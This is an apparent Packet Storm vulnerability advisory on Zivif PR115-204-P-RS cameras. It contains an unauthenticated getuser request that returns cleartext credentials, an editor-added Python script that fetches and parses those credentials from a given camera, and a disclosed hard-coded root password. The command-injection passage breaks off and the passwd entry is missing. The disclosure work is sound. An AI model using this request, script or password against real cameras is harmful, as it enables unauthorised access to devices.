
Packet Storm | Silas Cutler | PACKETSTORM:145386
Dec 13, 2017

Zivif PR115-204-P-RS Bypass / Command Injection / Hardcoded Password

Silas Cutler

0.87 High




Attack vector: Remote  
Authentication: None  
Researcher: Silas Cutler `p1nk` <[email protected]>  
Release date: December 10, 2017  
Full Disclosure: 90 days  
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107  
Vulnerable Device: Zivif PR115-204-P-RS  
Version: V2.3.4.2103  
1 September 2017: Initial alerting to Zivif  
1 September 2017: Zivif contact established.  
3 September 2017: Details provided.  
7 September 2017: Confirmation of vulnerabilities from Zivif  
5 December 2017: Public note on Social Media CVE-2017-17105,  
CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic.  
10 December 2017: This email  
Implementation of access controls in Zivif cameras is severely lacking.  
As a result, CGI functions can be called directly, bypassing  
authentication checks.  
This was first identified with the following request (CVE-2017-17106)  
http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser  
Cameras respond to this with:  
```
var name0="admin"; var password0="admin"; var authLevel0="255"; var
name1="guest"; var password1="guest"; var authLevel1="3"; var
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";
var password3=""; var authLevel3="3"; var name4=""; var password4="";
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var
password7=""; var authLevel7="3"; var name8=""; var password8=""; var
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0
```
Credentials are returned in cleartext to the requester.  
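The following is an added example from the editor, not code from the original advisory or from Zivif. It issues the same unauthenticated `getuser` request described above and parses the JavaScript-style `var nameN="..."; var passwordN="..."; var authLevelN="...";` body into account records, then flags accounts whose password is empty, equals the username, or is `admin`. The host argument, the `CameraUser` record type and the trimmed sample body are assumptions for illustration; the sample is constructed from the response shown on the page. Against a fixed camera the request should fail with a 401/403 and `fetch_getuser` raises `urllib.error.HTTPError`.

```python
import re
import urllib.request
from dataclasses import dataclass
from typing import Dict, List

# Added example (not part of the original advisory). Path taken from the
# advisory; the parsing helpers and record type below are the editor's own.
GETUSER_PATH = "/web/cgi-bin/hi3510/param.cgi?cmd=getuser"

# Matches one assignment such as:  var password0="admin";
_VAR_RE = re.compile(r'var\s+(name|password|authLevel)(\d+)="([^"]*)";')


@dataclass
class CameraUser:
    slot: int
    name: str
    password: str
    auth_level: int


def parse_getuser(body: str) -> List[CameraUser]:
    """Parse the getuser response into one record per populated user slot.

    Assignments are keyed by slot number, so their order and line wrapping
    in the body do not matter. Slots with an empty name are dropped.
    """
    slots: Dict[int, Dict[str, str]] = {}
    for field, idx, value in _VAR_RE.findall(body):
        slots.setdefault(int(idx), {})[field] = value
    users = []
    for idx in sorted(slots):
        rec = slots[idx]
        if not rec.get("name"):
            continue
        level = rec.get("authLevel", "0")
        users.append(CameraUser(idx, rec["name"], rec.get("password", ""),
                                int(level) if level.isdigit() else 0))
    return users


def weak_accounts(users: List[CameraUser]) -> List[CameraUser]:
    """Flag accounts with an empty password, password == username, or 'admin'."""
    return [u for u in users if u.password in ("", "admin", u.name)]


def fetch_getuser(host: str, timeout: float = 5.0) -> List[CameraUser]:
    """Request getuser with no credentials at all (no Authorization header).

    On a vulnerable firmware the camera answers 200 with the account list;
    a fixed camera should reject this and urllib raises HTTPError.
    """
    url = f"http://{host}{GETUSER_PATH}"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return parse_getuser(resp.read().decode("utf-8", "replace"))


# Constructed sample, trimmed from the response quoted in the advisory.
SAMPLE_BODY = (
    'var name0="admin"; var password0="admin"; var authLevel0="255"; '
    'var name1="guest"; var password1="guest"; var authLevel1="3"; '
    'var name2="admin2"; var password2="admin"; var authLevel2="3"; '
    'var name3=""; var password3=""; var authLevel3="3";'
)


if __name__ == "__main__":
    import sys
    # Usage: python getuser_audit.py <camera address>; no argument parses the sample.
    users = fetch_getuser(sys.argv[1]) if len(sys.argv) > 1 else parse_getuser(SAMPLE_BODY)
    weak = weak_accounts(users)
    for u in users:
        flag = " (weak)" if u in weak else ""
        print(f"slot {u.slot}: {u.name} / {u.password} authLevel={u.auth_level}{flag}")
```

Run it with a camera address to audit a device you own; with no argument it parses the constructed sample, which yields three accounts, all flagged weak (admin/admin, guest/guest and admin2/admin).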
In exploring, unauthenticated remote command injection is possible using  
Command results are not returned; however, the commands are executed by the system.  
One last finding was that the /etc/passwd file contains the following  
hard-coded entry (CVE-2017-17107):  
The password hash in that entry cracks to cat1029.  
```
(none) login: root
Login incorrect
(none) login: root
Welcome to SONIX.
```
Because of the way the file system is structured, changing this password  
requires more work than running passwd.  
The hi3510 is shared with a couple other cameras I'm exploring. The  
motd saying /Welcome to SONIX/ has led me to speculate parts of this  
firmware may be shared with other cameras.  